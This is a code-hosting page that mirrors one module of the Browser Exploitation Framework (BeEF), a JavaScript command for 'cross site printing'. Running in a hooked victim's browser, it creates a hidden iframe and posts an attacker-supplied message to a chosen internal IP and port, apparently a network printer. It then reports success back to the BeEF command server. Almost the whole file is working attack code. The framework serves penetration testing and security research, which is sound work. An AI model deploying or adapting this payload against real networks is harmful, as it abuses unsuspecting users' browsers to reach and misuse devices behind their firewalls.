Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/ipec/cross_site_printing/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
	var target_ip = "<%= @ip %>";

10
	var target_port = "<%= @port %>";

11


12
	// send a request

13
	function send_msg(ip, port) {

14


15
		// create iframe

16
		var iframe = document.createElement("iframe");

17
		iframe.setAttribute("id","ipc_cross_site_printing_<%= @command_id %>");

18
		iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");

19
		document.body.appendChild(iframe);

20
		iframe = document.getElementById("ipc_cross_site_printing_<%= @command_id %>");

21


22
		// create form

23
		var action = "http://" + ip + ":" + port + "/";

24
		myform=document.createElement("form");

25
		myform.setAttribute("name","data");

26
		myform.setAttribute("method","post");

27
		myform.setAttribute("enctype","multipart/form-data");

28
		myform.setAttribute("action",action);

29
		iframe.contentWindow.document.body.appendChild(myform);

30


31
		// create message textarea

32
		myExt = document.createElement("textarea");

33
		myExt.setAttribute("id","msg_<%= @command_id %>");

34
		myExt.setAttribute("name","msg_<%= @command_id %>");

35
		myExt.setAttribute("wrap","none");

36
		myExt.setAttribute("rows","70");

37
		myExt.setAttribute("cols","100");

38
		myform.appendChild(myExt);

39


40
		// send message

41
		iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";

42
		myform.submit();

43


44
		// clean up

45
		setTimeout('document.body.removeChild(document.getElementById("ipc_cross_site_printing_<%= @command_id %>"));', 15000);

46
	}

47


48
	// validate target

49
	if (!target_port || !target_ip) {

50
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');

51
	} else if (!beef.net.is_valid_port(target_port)) {

52
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');

53
	// send request and wait for reply

54
	} else {

55
		send_msg(target_ip, target_port);

56
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');

57
	}

58


59
});

60


61


62